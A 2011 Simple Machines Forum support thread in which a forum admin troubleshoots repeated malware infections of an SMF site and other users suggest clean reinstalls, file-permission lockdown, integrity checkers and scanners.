Simple Machines Community Forum

We had a slightly outdated version of 1.something that got infected with a virus called the Blackhole Exploit. We removed it, upgraded the software to 2, and are continually running malware/virus scanners on our server. It keeps coming up clean. We even tried getting different brands of virus scanners and they come up clean.

However, some users are continually telling me their virus software is going off when visiting the site. Today I had a visitor tell me he plugged in a brand new computer, visited a couple sites fine, hit ours and the virus software went off and crashed his browser, eventually it chewed his hard drive until the machine would no longer run at all.

I'm at a loss here. Not sure what to look for or where. But my server host is now suggesting I go through *every single possible line of code* in the website (Literally millions and millions of lines) to look for something out of the ordinary. Since I don't spend a lot of time looking at simple machines code, I'm not sure I would notice what is out of the ordinary...

Any advice? Ideas? Suggestions?

First off I would suggest trying to restore a clean backup that you know is not infected, if that's not possible I would suggest backing up the web root directory and database then clear all the files from the SMF root directory and then upload a fresh version of the SMF files and see if that solves it.

Edit: An after thought, if your on shared hosting it could be another hosting account on the server that is infected, I recently saw a very nasty installer virus take hold of a shared hosting environment, affected multiple hosting accounts until properly removed.

have you changed your passwords? i would suggest that and upload fresh files to override what you have currently. also i would ask your host if they know how this happened, it may be a server side issue.

I did change all the passwords.

I did not do a fresh install - I upgraded from the 1.x to the latest 2.x. Then I customized the interface, so I suppose if I do a fresh install, all that will be lost?

Is it possible it's in the database? If so how in the heck does one check for that.

Did I mention this is a VERY active forum, and I cannot lose the posts that are up there now.

I am on a dedicated server.

if you upload fresh files you will not loose your members/threads etc they are in the database, but you would loose your mods to the code which can be reapplied.

i dont know if a virus can be in the database but i doubt it is possible.

I had a problem with someone hacking my server, they got into all my sites and infected all my files in each site. In the end my hosting account had to be reset fully to how it was when I first got it. You may have to delete all files on your server. If you have more than one site you should check all the other sites. You should change your FTP passwords and see if that helps.

Quote from: slumdog10 on October 07, 2011, 04:27:41 PM
I had a problem with someone hacking my server, they got into all my sites and infected all my files in each site. In the end my hosting account had to be reset fully to how it was when I first got it. You may have to delete all files on your server. If you have more than one site you should check all the other sites. You should change your FTP passwords and see if that helps.

Who is your host?

You could have a 'true' virus like and installer or a rootkit, they can be quit nasty to remove, have a look at installing and running the below, there all free amd can be removed after words.

AVG Free - Anti Virus if you dont already have one
Spybot - Anti spyware
Malwarebytes - Anti spyware

You should always use a few programs as one alone never removes everything, keep track of the names of anything the fix/heal or remove.

Thanks everyone..

So we do have AVG and I believe another software scanning for stuff, and it comes up with nothing.

This is on a dedicated server, and there is no other sites on the box then this one.

Got an email this AM that one of my users software is detecting last week the site had "MBR viruses"  and now he says his  "Anti-Malware is catching a Fakesysdef trojan and the PDFjsc.rm exploit virus on every visit." Worse, he says his virus software started popping up *After* I upgraded simple machines to 2.0. ?


How can that be if the software we have on the server says it is clean?

The host is asmallorange.com.

I went through the site and deleted any files and folders that are not being used, and looked through a lot of code, but not all of it... and I don't see anything.

you have managed hosting? ask your host to take a look into the issue that is why you are paying them.

If you managed hosting then by all means get your host involved. Have a look at a program called hijackthis, it will tell you everything you need to know about running processes and services and point you to what could be causing your trouble.

Make sure you empty all temp folders.

Also its no harm to google the virus/trojan name followed by 'remover' as if its quite an annoying virus theres most likely a tool that removes it completely.

Let us know how you get on and what your host say.

My host is hosting24 .com . I lost all my sites as it was impossible to search which ones had been tampered with.

Thanks Ziycon, that gives me something to tell the host to try...

Here's a message I just got from a user.. this is what is virus software is telling him:

" Danger: Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: 65.75.175.149/Home/index.php
Name: Blackhole Exploit Kit (type 1889)"

One problem with that: That is NOT the IP of my server or website? WHat the hell?

It looks like the virus is redirecting visitors to a malicious url. Do a google for 'how to remove black hole exploit', follow one or two of the results, tbis should point you in the right direction.

We thought we found it. It probably came from not having the simple machines upgraded. We deleted it, did a ton of checking through files for anything that should not be there, and were just starting to feel confident that we killed it. Then some users started reporting that again, their virus software keeps popping up on different parts of the site saying we have a virus, but then it shows the virus on their computer and an IP to another computer (same IP every time).

I'm losing visitors and traffic over this, and now their are people all over facebook saying "Don't go to that site it's full of viruses!". Not good.

It only affects SOME IE users.

Hosting company is not helping much. I may need to find a really qualified 3rd party to hunt it down and kill it once and for all. Then I got this email today, as I have another site running vBulletin:

"A recent vBulletin 4 (all versions, Suite & Classic) report indicated that if an installation had been hacked previously, the attacker could hide malicious code to allow a repeated attack. To further strengthen vBulletin's security - additional security checking and query cleaning were added to thwart such attacks.
"

Is it possible Simple machines has NOT been patched sufficiently to stop this thing?

Please note I did a clean install last week. That stopped it for a few days, then it started up again.

Anyone know of a good 3rd party to help?

if another application you are running might have been hacked it is possible they can use that a backdoor into hacking your other applications. make sure all apps you use are updated and check for added files on your server and file last modified date/time.

Keep in mind that sometimes, attackes (automated or manual) will upload scripts on a webserver to allow a backdoor into the system. If you only just did an overwrite of the files and didn't do a full clearing of the website, it is likely that a backdoor script remains. There are two ways to check for this: look at every directory and compare with what should be in there, or do a "scorched earth" re-load. The later is easier, but requires some preparation.

First, backup your database. It contains all the posts, members, and other forum data. You should be taking backups normally.
Next, if you allow uploads (avatars, attachments), you'll need to backup the attachments directory. If you do make backups of this, you will also need to check it for suspicious files.
Also, grab a copy of the Settings.php file. This holds connection information for your forum to talk to the database. Make sure to open it and check for any suspicious lines of code.

Now that you have the important things, delete the entire SMF directory. When this is done, upload the contents of the SMF install archive. Delete the install.php file and all the .sql files. Upload the backed-up Settings.php. If you made a backup of it, also upload the Attachments directory.

This should give you a stock SMF install with fully clean files.

If you have other website files on your server, you will need to check them in some way or another as well, or you could run into issues again.

Its extreme but I would recommend backing up all sites and databases and them deleting all sites(flat files) then put a temporary page in place for all sites, now get users that are reporting virus warnings to visit this temporary page and see if they get a warning, if so then its not your websites and the server is infected.

You can then take it from there as the next course of action.

Quote from: 青山 素子 on November 01, 2011, 11:52:04 AM
Keep in mind that sometimes, attackes (automated or manual) will upload scripts on a webserver to allow a backdoor into the system. If you only just did an overwrite of the files and didn't do a full clearing of the website, it is likely that a backdoor script remains. There are two ways to check for this: look at every directory and compare with what should be in there, or do a "scorched earth" re-load. The later is easier, but requires some preparation.

First, backup your database. It contains all the posts, members, and other forum data. You should be taking backups normally.
Next, if you allow uploads (avatars, attachments), you'll need to backup the attachments directory. If you do make backups of this, you will also need to check it for suspicious files.
Also, grab a copy of the Settings.php file. This holds connection information for your forum to talk to the database. Make sure to open it and check for any suspicious lines of code.

Now that you have the important things, delete the entire SMF directory. When this is done, upload the contents of the SMF install archive. Delete the install.php file and all the .sql files. Upload the backed-up Settings.php. If you made a backup of it, also upload the Attachments directory.

This should give you a stock SMF install with fully clean files.

If you have other website files on your server, you will need to check them in some way or another as well, or you could run into issues again.

That's what I did.. but we are still getting the virus warnings... so we've now looked through all the databases, and the only thing we found was a lot of HTML in the Simple Machine DB in the posts. It's an insane amount of posts to check, so it will take a while to see if any of them are malicious.

Just a thought, if you can write a script that strips html/php tags and run it on a copy of the database, install the stripped copy, and see if the problem persists, it might tell you something useful.

http://php.net/manual/en/function.strip-tags.php

Quote from: Flavious on November 01, 2011, 02:23:17 PM
That's what I did.. but we are still getting the virus warnings... so we've now looked through all the databases, and the only thing we found was a lot of HTML in the Simple Machine DB in the posts. It's an insane amount of posts to check, so it will take a while to see if any of them are malicious.

What's one of the links causing the issue?

Normally, SMF won't print raw HTML from database posts.

Try using something like the query below first to get an idea of how many posts, you may be able to manually fix them. If the HTML tags are using BBCode change the brackets to square ones.
SELECT id_msg, body FROM <prefix>_messages WHERE body LIKE '%<html%</html>%';

Still looking though the DB - thanks for all the suggestions/help!

Also, I've been in contact with AVG as most users complaining of the issue appear to be using this as their virus protection software. Here's there official response:

"Please accept our apologies due to the inconvenience caused in regard to the mentioned issue. We truly appreciate your time and actions taken in order to provide us with more information about this.

Unfortunately the detection was a false alarm. This means that the file or website is clean and virus-free, but AVG detects it as a virus due to an error in virus definitions. Unfortunately, false alarms do appear from time to time in every security software.

We checked the URL and didn't find any pop up or detection. The false detection probably fixed on the previous AVG virus database update. Update your AVG and check the situation again."

So could it be that SEVERAL virus software providers are flagging us with false positives???

if they are different software being used, i would say it is not a false positive.

Get all your AVG users to update their definitions and if that fixes the issue for them, find out what other anti-virus software other users having the problem are using and ask them to update their definitions but its very VERY rare that multiple, even two anti-virus providers would create a false positive with a definition at the same time for the same 'virus'.

There's a virus going round that's spread via browsers.  Can't remember the name, but there's a thread somewhere on the forum about it.  If any of your members has it on their computer, it will keep re-infecting your forum.

I suppose that such a virus could exist, but the way it would work would be to cause the browser to exploit known security holes in the web site. Once you close up such holes, no problem for the site, except for infected browsers constantly pounding on your site trying to break in.

When will it become legal to kill all malware authors, wherever they are in the world?

If I get a few minutes, will try to find the thread that names the virus.  Found some technical info on how it works, only some of which I understood.

Quote from: MrPhil on November 03, 2011, 09:59:23 AM
When will it become legal to kill all malware authors, wherever they are in the world?

I'd vote for such a law but obviously it's a pipe dream. ::)

I think a lot of our issues were coming from Google Ad Sense. Turned off all the google ads, and like magic the problems stopped. Tried contacting google every wich way from sunday, I get nothing from them. "Do no evil" indeed.

Had a new one today in that one user has links showing up on the SMF home page that are not there. As of yet, I can't duplicate it.

SMF was infected again. I just noticed that SMF wanted files upgraded for a security patch. I did that, and then I found javascript (theme.js) and an htaccess file in the SMF directory that was infected. The htaccess contained a command to dload a .js file, and the theme.js file contained an Iframe attack to download from zombie computers.

After the last infection, we did a clean install of SMF, reviewed EVERY file on the website, shut off a ton of functionality elsewhere on the website, deleted a ton of unused files on the website, changed all the passwords, and for about 1-2 weeks everything was fine.

Question: How the hell is this happening? Should I be looking at a new dedicated server manager? Should I be looking at ditching SMF? Is there something on my server that is moving around and re-infecting crap when it gets a chance? How the hell does this thing get permission to write to the htaccess and javascript files?

I appreciate the help so far.... We've lost 50% of our traffic to the site because of this issue. It's a very busy site with tons of traffic, and the growing chorus of people screaming because their entire hard drive was wiped out eats my guts out and has made it impossible for me to sleep in several days.

Thanks all.

Since you have lots of other code on your website (you say), it's possible that's where the attack is getting in. I know the standard line from SMF is "there are no known security exploits", and that may (or may not) be true, as long as you are at the latest SMF version (2.0.2). Since no one else seems to be complaining about such attacks, it's unlikely (though not impossible) that it's in the SMF software you're getting from this site. Removing SMF and using another forum probably isn't going to help you, in other words. Is your other site software homebrew or installed standard/commercial applications? Do other sites sharing your server (if any) also report security problems? Have you not only scrubbed your site of all code that you can't account for, but also scanned all PCs used for admin access for spyware and viruses? After doing that, have you changed all passwords (site manager, FTP, admin/privileged SMF accounts, etc.)? Don't forget that FTP sends passwords in plain text, so you might want to switch to secure FTP (SSL). Have you done a daily (or even twice daily) directory listing with file dates and sizes, to see what's being modified? You might try making all directories 555 and all files 444, except any that SMF or other applications need to write to on a regular basis (attachments, avatars, etc.). Only (temporarily) grant write permissions when you want to upload a theme or a mod.

I wish you the best in getting this cleaned up -- it sounds like someone is really determined to get you.

Quote from: MrPhil on December 26, 2011, 04:20:53 PM
Removing SMF and using another forum probably isn't going to help you, in other words. Is your other site software homebrew or installed standard/commercial applications?

There is one other application on the site that we wrote from scratch. We have checked every line of code in it, and had a third party check it as well. We've never had any problems there, no files have been written to in that directory, so I am reasonably sure it was not any of that code. Pretty simple app anyway, not much to it.

QuoteDo other sites sharing your server (if any) also report security problems?

It's a dedicated server.

QuoteHave you not only scrubbed your site of all code that you can't account for, but also scanned all PCs used for admin access for spyware and viruses?

Yes we have scrubbed all outdated or unidentified files some time ago. The macs and PC's used to do anything to the site are checked frequently, checked today, all came up clean.

QuoteAfter doing that, have you changed all passwords (site manager, FTP, admin/privileged SMF accounts, etc.)?

This was done after the first infection. Still working on it now after this latest infection.

QuoteHave you done a daily (or even twice daily) directory listing with file dates and sizes, to see what's being modified? You might try making all directories 555 and all files 444, except any that SMF or other applications need to write to on a regular basis (attachments, avatars, etc.). Only (temporarily) grant write permissions when you want to upload a theme or a mod.

We talked about this today, and it is one option I think we will try - lock down everything so nothing can be written - except attachments and avatars... what else cannot be locked down? Or what all can I lock down without breaking Simple Machines? 

QuoteI wish you the best in getting this cleaned up -- it sounds like someone is really determined to get you.

There is a possibility of one group doing this.. they have openly made it their goal to destroy my website for some time now. But I would need proof before I could take any kind of legal action or get the police involved. So far the only consistent factor has been Simple Machines.

Quote from: Flavious on December 26, 2011, 03:57:32 PM
SMF was infected again.

Not totally related, but I've noticed a persistent re-infection on one specific site I help manage that's on Dreamhost. The last time, I removed write permissions on all files and things still managed to become infected. Looking through using SSH, I found a few files with another account's owner were in the website root. About the only thing I can determine after that is that their shared hosting servers aren't all that secure. None of my other six plus SMF installs (mixed 1.1 and 2.0) have ever had an issue. I think it would be way too premature to blame the SMF software itself when there is no evidence of a systemic problem.

Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.

Okay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?

Are you using a commercial control panel package, or manually configuring things? How are you running PHP?

Keep in mind that "utility" web applications may also be an entry point. I once had a client who had a server intrusion. The attacker was using an old phpMyAdmin installation as a launching point. The client thought they had it blocked to outside IPs and thus didn't need to keep it updated, but mis-configured the server and left it open to the world.

Quote from: Flavious on December 26, 2011, 06:21:20 PM
Yes we have scrubbed all outdated or unidentified files some time ago. The macs and PC's used to do anything to the site are checked frequently, checked today, all came up clean.

Some of the newer Windows-based password-stealers use rootkit techniques to hidethemselves. Scan using a bootable CD antivirus tool. UBCD4Windows works and many AV companies offer a burnable ISO that will scan your system.

Quote from: Flavious on December 26, 2011, 06:21:20 PM
We talked about this today, and it is one option I think we will try - lock down everything so nothing can be written - except attachments and avatars... what else cannot be locked down? Or what all can I lock down without breaking Simple Machines? 

If you want something a bit industrial-strength, look at AIDE (http://aide.sourceforge.net/). It's pretty awesome. There is also the much older Open Source Tripwire (http://sourceforge.net/projects/tripwire/), but it hasn't been significantly updated in some time.

I also encourage the use of Fail2ban (http://www.fail2ban.org/). It can be configured to examine various system logs and ban IPs found in those logs. I usually at the least have it watch SSH and FTP services.

In theory, you can make everything read-only. It is recommended at minimum to keep the cache directory and Settings.php writable. If you allow attachments or uploaded avatars, you'll need to set those as well.

Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.

Quote from: Flavious on December 26, 2011, 06:21:20 PM
There is a possibility of one group doing this.. they have openly made it their goal to destroy my website for some time now. But I would need proof before I could take any kind of legal action or get the police involved. So far the only consistent factor has been Simple Machines.

While that might be possible, it really depends on the skills of those involved. Statistically, it's more likely there is some automated attack being done by a script kiddie than some targeted attack directly against you.

Also, as I noted earlier, there hasn't been any evidence of a systemic problem with SMF itself. With all the users, an active exploit would be noticed quickly from reports.

QuoteOkay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?

Are you using a commercial control panel package, or manually configuring things? How are you running PHP?

No just one domain.

Cpanel, very minimal.

Ok First learn what your talking about: 'MBR viruses' = Master Boot Record = servers HDD so no matter how much you clean your site you will be reinfected!  Your hosts issue to resolve that.

AVG free: You got more chance of knitting fog than that piece of **** doing the job.

Run Emisoft anti malware, Malwarebytes then install Kaspersky internet security 30 day trial to keep your own PC under control as you could be the infection source if you are relying on AVG. Avira antimalware scanner is a decent free program to use after. Dont run two together as they will conflict.

If SMF was the culprit im sure more than you would be reporting this by now.

Just my 2pence worth. ;)

Quote from: Flavious on December 26, 2011, 07:15:47 PM

QuoteOkay, that's somewhat good. Do you have multiple domains on the server? What services are running and listening on ports? How updated are you on patches?

Are you using a commercial control panel package, or manually configuring things? How are you running PHP?

No just one domain.

Cpanel, very minimal.

What about server patches? I'm guessing you're on Linux?

cPanel's default settings aren't very good, so you might want to review that configuration as well.

Quote from: nightbre on December 26, 2011, 07:54:06 PM
Ok First learn what your talking about: 'MBR viruses' = Master Boot Record = servers HDD so no matter how much you clean your site you will be reinfected!  Your hosts issue to resolve that.

MBR viruses are not really all that common anymore. Especially with the whole NT stack, they tend to break things more than infect them. It is more likely there is a rootkit (http://en.wikipedia.org/wiki/Rootkit) involved, which is more difficult to detect.

Quote from: nightbre on December 26, 2011, 07:54:06 PM
AVG free: You got more chance of knitting fog than that piece of **** doing the job.

AVG's detection engine isn't bad, but their newest software packages have become very bloated. However, if you read, you'll see that the mention of AVG was from end users browsing the website. Rant about AVG all you like, but the people actually using it won't read that.

Quote from: nightbre on December 26, 2011, 07:54:06 PM
Run Emisoft anti malware, Malwarebytes then install Kaspersky internet security 30 day trial to keep your own PC under control as you could be the infection source if you are relying on AVG. Avira antimalware scanner is a decent free program to use after. Dont run two together as they will conflict.

Haven't heard of Emisoft before. KAV and Avira have both been decent. However, for the Windows systems, a bootable scanner CD is the best option as it will allow detection of items that may hide when Windows itself is running.

Quote from: nightbre on December 26, 2011, 07:54:06 PM
If SMF was the culprit im sure more than you would be reporting this by now.

Yeah, probably. Isolated incidents are usually related to that specific server or website contents.

Kaspersky has good bootable scanner that runs on linux.  You can download the iso and burn it to cd, or also download the usb app that will create a bootable stick with the iso.  It will also configure your network adapter to update the signature file before the scan. The only negative I have found with it is that it has a problem configuring some wireless devices. If your only web access is wireless, there is a potential issue with updating the signature.

QuoteMBR viruses are not really all that common anymore. Especially with the whole NT stack, they tend to break things more than infect them. It is more likely there is a rootkit (http://en.wikipedia.org/wiki/Rootkit) involved, which is more difficult to detect.

Kaspersky do a good range of standalone apps and a rescue disk too which can be booted from, Avira also do one that can be booted from too.

QuoteAVG's detection engine isn't bad, but their newest software packages have become very bloated. However, if you read, you'll see that the mention of AVG was from end users browsing the website. Rant about AVG all you like, but the people actually using it won't read that.

From my jobs point of view (IT Tech) Systems with AVG , Norton and Mcafee can report your system safe but when scanned with another scanner IE malwarebytes/Emisoft for instance they suddenly start finding infections off the back of the other scanner. Its entirely up to the end user to decide how much security they wish to implement but personally I would not rely on any of the 3 named alone. Kaspersky suite or ESET would be a top choice for decent security generally available for a reasonable price. Avira is my choice of free scanners but I would also run a manual scan with Malwarebytes regular too.

Another biggie that gets overlooked a lot is people dont update Flash Java and Windows updates which also leaves holes they neednt have. Browsers generally bug you to update but windows can be very out of date in some instances.

(overlaps busters post but was written when he posted)

Quote from: 青山 素子 on December 26, 2011, 06:39:38 PM

Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.

Okay, that's somewhat good.

Actually, that's bad in the sense that it rules out a common attack route. Dedicated server security can be better than shared, but if you or your host are lax, the bad guys still may be able to get in. It's just usually harder than on a shared server.

Quote
In theory, you can make everything read-only. It is recommended at minimum to keep the cache directory and Settings.php writable. If you allow attachments or uploaded avatars, you'll need to set those as well.

Settings.php should always be read-only, once you have the settings settled down. I see that the morons are still writing the timestamp of the last database error directly to the Settings.php, despite my telling them repeatedly that's a stupid thing to do. There is absolutely no need to rewrite Settings.php on a regular basis -- use a separate file for the database error timestamp (see my sig > Fixes). Users are still getting Settings.php emptied out, perhaps not as frequently as in SMF 1.x. Once you've got the settings right, lock down the file 444.

As for attachments, avatars, and such, you may just have to prevent uploads to those directories while you're getting the attacks sorted out. There's no real harm in making the directories read-only (555) for a while. Caching can probably be turned off with little impact on performance -- you may want to try that. Do you have any files or directories that are "world writable" (666 or 777)? Unless you absolutely need that for selected directories because PHP runs as a random user (not as owner or in your group), you should have more restrictive permissions (755 or at worst, 775). Check your higher level permissions (such as public_html/ or the equivalent) -- if they're 755 and lower level directories are 777, that could be letting the hacker in. Talk with your host about whether 750 would work for you (or just try it).

Quote
Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.

Keep an eye out for "hidden" files (starting with a period) that may not show up in your host File Manager or FTP. Make sure you can see any (such as .htaccess). Also don't just "eyeball" file names -- hackers generally aren't dumb enough to give obvious names like "spreadInfection.php" to their files -- they'll be something important and official sounding, such as PermissionsCheck.php and the like. Compare your list of files to a fresh copy of SMF to make sure of what's supposed to be there. Also compare file sizes and last modified dates -- has a file been changed later than you can account for? An automated checking tool would be good for this (even better, doing an MD5 checksum on each file).

Quote

Quote from: Flavious on December 26, 2011, 06:21:20 PM
So far the only consistent factor has been Simple Machines.

While that might be possible, it really depends on the skills of those involved. Statistically, it's more likely there is some automated attack being done by a script kiddie than some targeted attack directly against you.

If SMF is the only "commercial" software you have, it may be the only one for which they have source and can find any vulnerabilities. It's always possible that they've found an entry that no one at SMF knows about. Just as likely, though, is that your host has a security problem of their own that is allowing the hacker to get in as "owner" and do whatever they want. Have you been looking at access logs to see who is in there, from what IP address? If they're bypassing the regular login process, even that may fail to reveal anything. I would definitely have your host monitoring all activity on your site, on the chance that someone is getting in through a back door.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM

Quote from: 青山 素子 on December 26, 2011, 06:39:38 PM

Quote from: Flavious on December 26, 2011, 06:21:20 PM
It's a dedicated server.

Okay, that's somewhat good.

Actually, that's bad in the sense that it rules out a common attack route. Dedicated server security can be better than shared, but if you or your host are lax, the bad guys still may be able to get in. It's just usually harder than on a shared server.

It's good in the fact that it eliminates a large portion of possible entry points. It also means that the user can take more action to find out the cause than if they were on a shared environment.

The whole trick to debugging and similar things like this troubleshooting is to divide up tasks and systemically remove them from consideration.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Settings.php should always be read-only, once you have the settings settled down. I see that the morons are still writing the timestamp of the last database error directly to the Settings.php, despite my telling them repeatedly that's a stupid thing to do.

I wouldn't call them morons. Anyway, the entire developer pool went through a turn-over not too long ago, so I'm fairly sure they were a bit more occupied with getting the product cleaned up and ready than fixing what is a silly but small issue - there were much bigger things to handle.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM
There is absolutely no need to rewrite Settings.php on a regular basis -- use a separate file for the database error timestamp (see my sig > Fixes). Users are still getting Settings.php emptied out, perhaps not as frequently as in SMF 1.x. Once you've got the settings right, lock down the file 444.

Save the preaching for the Bug Reports board or something. This topic is about trying to help a user determine why they are having issues on their website.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM
As for attachments, avatars, and such, you may just have to prevent uploads to those directories while you're getting the attacks sorted out. There's no real harm in making the directories read-only (555) for a while.

Agreed. If you can disable attachments and avatar uploads for a while, it would be useful to see if that has any affect.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM
Caching can probably be turned off with little impact on performance -- you may want to try that.

For a small enough site, agreed. If it's a busy site you might notice some performance impact, but it will be up to you to determine if it's too bad to leave off for a while.

Quote from: MrPhil on December 26, 2011, 10:31:51 PM

Quote
Also, while you're locking things down, check all the files in every directory to see if they are supposed to be there. On that earlier infection on DreamHost I found a PHP-based shell tool hidden a few directories deep.

Keep an eye out for "hidden" files (starting with a period) that may not show up in your host File Manager or FTP. Make sure you can see any (such as .htaccess). Also don't just "eyeball" file names -- hackers generally aren't dumb enough to give obvious names like "spreadInfection.php" to their files -- they'll be something important and official sounding, such as PermissionsCheck.php and the like. Compare your list of files to a fresh copy of SMF to make sure of what's supposed to be there. Also compare file sizes and last modified dates -- has a file been changed later than you can account for? An automated checking tool would be good for this (even better, doing an MD5 checksum on each file).

I find the "find" tool works great. Doing some checks for files that have been modified in the last x days should give a small list of things to check. It'll also return hidden files (dot-files) that exist and have been modified in that time period. That's how I found the PHP shell file.

Once you get a good check of all the files, a tool like AIDE or Tripwire is useful as you'll get a report when the file changes (both tools look at checksums of files to see if the contents changed).

Quote from: MrPhil on December 26, 2011, 10:31:51 PM
It's always possible that they've found an entry that no one at SMF knows about. Just as likely, though, is that your host has a security problem of their own that is allowing the hacker to get in as "owner" and do whatever they want.

I'd argue that it's more likely to be a server or environment issue than an SMF issue. It's really easy to mess up on a configuration and much less likely that only one group/person found a specific SMF security hole that is only being used against a single target.

I need to weigh in here with my own issues.  My forum members (and I have a very large forum) have been reporting since December 10th that they have either been infected with malware from my site, in particular the forum, or their AV has been blocking attempted intrusions.   Some have been very specific as to where they were reading in the forum when this occurred.

An analysis of the 20 or so reports showed 3 Norton users reporting that Norton had blocked Malicious Toolkit from their computers.  The rest reported either attempts to install or actual infections of several variants of rogue antivirus viruses (Win 7, VISTA 2012, Antivirii 2011) while using AVG, McAfee, Avast and MSE.    Users of malwarebyte reported they were getting nothing. 

I contacted Google Webmaster Help.  A Google Diagnostic Scan of my site on December 10 showed that no malware has been delivered from my site in the previous 90 days.   Google did a more thorough scan of 30 pages on December 24th and still found nothing suspicious coming from my site.   My hosting provider, who happens to be MonteCarloHosting.net (owner Christian is a mod on one of the SMF forum boards), did a server scan and found nothing.   My forum is on a dedicated server.  Our AV software, Zone Alarm, was not finding anything.  My moderators were not getting any AV alerts or infections. 

My husband, the IT guy, did a clean reinstall of the SMF software after reading this thread.  All passwords were changed.   I deleted unused themes and the one mod package I was using.  Also upgraded to 2.0.2 within hours of it being released (was on 2.0) .    Google Adsense ad were also turned off the forum for two days.   

However, last night when I turned the ads back on, I promptly got an alert from Zone Alarm asking for permission to run a program from my local settings/temp directory which appeared to be malware by its name, a long string of letters and numbers followed by .exe.    I took a screen shot of my desktop at the time which shows I am on SMF, which ads were displaying and the AV notice.   I have already reported the possible problem to Google and turned off my ads again.   Not happy about that.   I'm still monitoring members to see if anyone is still getting malware while on the site.   

that does not sound like an smf issue, it sounds like an issue with your ads. there is nothing we can do to help that.

Dame2,

Sounds exactly like what we have going on. I am 98% sure it was an exploit in simple machines that allowed the virus to write to files on the server. Both times we've had issues, Simple Machines released a "security patch" right after we found we had an issue. In both cases, Simple machines will not say what the Security issue was, which is very disappointing. I can't help if I don't know what they changed.

Worse, I'm not sure that using the upgrade package on Simple machines gets rid of it. It looks more like the exploit in Simple Machines allows this thing to write to anywhere in your root directory - meaning you can replace all the simple machines files and it won't get rid of it. I've had 3 outside groups look at it, and all fingers point to simple machines. The server checks out, the other software checks out, and I've checked every single google ad with the help of google.

We have two ad servers on the site - google and a server we built ourselves. I experimented with shutting one off, then the other, and there really was no change. We have inspected *every* line of code elsewhere on the site, and we even searched the database(s) and came up with nothing.

This issue has cut my traffic from 200,000 visitors a month down to 50,000. We are seriously looking at building our own forum or if we have to, using vbulletin.

QuoteSome have been very specific as to where they were reading in the forum when this occurred.

When we were having problems, some users put into posts what they were seeing, in some cases posting code that caused the AVG software to go off. Delete the post and that problem stops.

QuoteI contacted Google Webmaster Help.  A Google Diagnostic Scan of my site on December 10 showed that no malware has been delivered from my site in the previous 90 days.   Google did a more thorough scan of 30 pages on December 24th and still found nothing suspicious coming from my site.   My hosting provider, who happens to be MonteCarloHosting.net (owner Christian is a mod on one of the SMF forum boards), did a server scan and found nothing.   My forum is on a dedicated server.  Our AV software, Zone Alarm, was not finding anything.  My moderators were not getting any AV alerts or infections. 

Ditto, except my server is at another provider, whom I do not want to embarrass here.. in case they have done everything right.

Moving this to the top so it's seen:

Flavious, here's what I'll do. I'm fairly convinced that SMF itself isn't at fault here, so I'm offering my time to inspect your server environment, run some checks, and even help configure a tool like AIDE or TripWire so you can get some proactive alerts if something should happen. The place I work normally charges close to $200 per hour for my time doing something like this, but I'll do this for free on my personal time as long as you agree to allow me to publish any findings as to the cause, if I should be able to determine it.



Dame2, if the issue only showed up after you turned advertising back on, it sounds like an infected ad. This has been known to happen. If you can pin down the ad causing the issue, you can usually report it to the ad network and get it removed.

Quote from: Flavious on December 29, 2011, 12:07:18 PM
Sounds exactly like what we have going on. I am 98% sure it was an exploit in simple machines that allowed the virus to write to files on the server. Both times we've had issues, Simple Machines released a "security patch" right after we found we had an issue. In both cases, Simple machines will not say what the Security issue was, which is very disappointing. I can't help if I don't know what they changed.

If you have that much certainty, you must have some evidence aside from timing. Please send the evidence to security>at<simplemachines.org and it will be reviewed by the developers.

I'm not aware of any vendor that will provide exploit code for their own product. To determine the issue, look at the patch that was provided. The changes will point at the problem code. If the issue was found externally and released, there are several places you can find exploit code.

Quote from: Flavious on December 29, 2011, 12:07:18 PM
Worse, I'm not sure that using the upgrade package on Simple machines gets rid of it. It looks more like the exploit in Simple Machines allows this thing to write to anywhere in your root directory - meaning you can replace all the simple machines files and it won't get rid of it. I've had 3 outside groups look at it, and all fingers point to simple machines.

Once again, please send the details to that above e-mail address. If three outside groups found evidence, certainly you can notify the vendor, right?

By the way, SMF can't trump filesystem security. If you want to be sure, make every single file and directory in your web root read-only.

If you want to get serious to tracking this thing down, install AIDE or Tripwire and keep all your request logs. When you get a ping on a changed file from the tool, check request and error logs for around the time of the file creation - at worst a 24 hour period if you can't narrow the hours.

As a system administrator professionally, I've had to investigate several breached servers. The usual suspect is rarely the cause. Nine out of ten times, the breach is due to:

• Unpatched third-party code due to the client not using the product anymore and forgetting it was still accessible
• A really poor server security configuration, usually lack of partitioning among services and multiple websites
• Badly-written custom code allowing various injection or directory-traversal attacks

Recurrent infections usually stem from a continued problem with the above or failure to clean out the entire infection, keeping a back-door open for the attacker. If you have poor logging in place, it's usually easier to rebuild an environment from scratch than audit everything.

Also, when I speak of an "attacker", 98% of the time it's some automated thing out there blasting sample exploit code blindly hoping to get a hit. It's almost never an actual intelligent human actively doing things.

I will take you up on that... if it happens again. I believe we found where the original bugger was written and from where it was writing files. Since deleting that, we have not had an issue, and yes, I am crossing my finger. I can get more details if you like.

To be fair, we have three possible sources of where it originally got on the server: Simple Machines and two pieces of custom PHP written way back in 2005. One of those has been eliminated, the other is highly unlikely to have an issue, but it is being upgraded to try and eliminate any possible holes.

If we take care of that, and get it again... then I'm going to need as much help as I can to get it taken care of. For now I'm just trying to convince all the users we lost that it's safe to come back. That's going to be a very difficult sell.

Thanks for the offer and a truly appreciate all the ideas we got from here.

I'm curious, personally. If you don't want to post publicly you can send me a PM. If you don't want to disclose in PM, let me know and I'll provide my e-mail address.

